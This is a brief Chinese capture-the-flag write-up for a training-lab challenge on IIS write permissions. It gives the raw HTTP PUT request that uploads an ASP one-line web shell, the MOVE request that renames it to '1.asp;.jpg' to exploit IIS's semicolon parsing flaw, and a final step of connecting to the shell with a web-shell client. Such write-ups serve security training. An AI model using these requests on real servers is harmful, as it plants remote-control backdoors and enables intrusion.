【WEB】IIS写权限漏洞分析溯源

【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe

【解法】

1.首先iis scaner发现有put漏洞，但是无法用工具注入。

2.尝试用burp抓包修改写入 

PUT /test.txt HTTP/1.1
Host: 219.153.49.228:43672
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: close
Content-Length: 23

<%eval request("123")%>

返回207说明成功写入

3.更改一句名称，利用iis漏洞，我们更名为1.asp;.jpg

burp写入

MOVE /test.txt HTTP/1.1
Host: 219.153.49.228:43672
Destination: /1.asp;.jpg
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Connection: close
Content-Length: 23

<%eval request("123")%>

虽然返回207 Multi-Status， 但是这个文件确实可以访问，菜刀连接即可。